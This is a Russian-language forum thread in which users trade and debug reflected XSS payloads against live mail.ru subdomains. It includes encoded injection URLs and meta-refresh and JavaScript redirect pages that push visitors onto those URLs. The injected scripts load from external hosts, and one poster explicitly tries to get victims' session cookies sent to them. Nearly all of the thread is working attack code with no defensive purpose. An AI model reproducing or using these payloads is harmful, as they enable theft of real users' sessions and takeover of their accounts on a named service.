12 декабря, в теме пассивные XSS - выложена вот такая пасивка
http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E

создаю index.html с таким содержимым
<html> <head> <META HTTP-EQUIV='Refresh' content ='0; URL= http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript src=%22http://test23.1gb.ru/js.js%22%3C/script%3E'> </head> </html>

файл js.js
alert(/bla bla bla/)

По идее ведь, при попадании на мою страничку - должна сработать эта пасивка и запустится этот тестовый скриптик.

А он почему то не запускается...

P.S. пробую это первый раз...

Там фильтрация на пробелы - они заменяются на нижний прочерк.

создаю index.html с таким содержимым
<html> <head> <META HTTP-EQUIV='Refresh' content ='0; URL= http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript src=%22http://test23.1gb.ru/js.js%22%3C/script%3E'> </head> </html>


заменил на
<html> <head> <META HTTP-EQUIV='Refresh' content ='0; URL= http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript src=%22http://test23.1gb.ru/js.js%22%3E%3C/script%3E'> </head> </html>

А то у меня там > не закрывалась после <script...

А с фильтрацией пробела.. заменить пробел на _ в тексте?
Попробовал. скрипт не выполнился... ну или я не увидел его выполнения...

Когда пишу скрипт внутри тэгов <script> </script> все работает... ставлю внешний - не работает. что еще я могу не так делать?

Разобрался)

У меня вопрос вот есть пассивка
http://11x11.mail.ru/tournaments/414252/act=join&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
Работает она токо у авторизованных
Почему она не присылает куки
со всеми остальными пассивками все работает

в index.php прописываю
<script>document.location.href="http://11x11.mail.ru/tournaments/414252/act=join&%27%3E%3C%27%27%3E%22%3E%3Cscript%20src=%22http://wowvk.ru/js.js%22%3E%3C/script%3E"</script>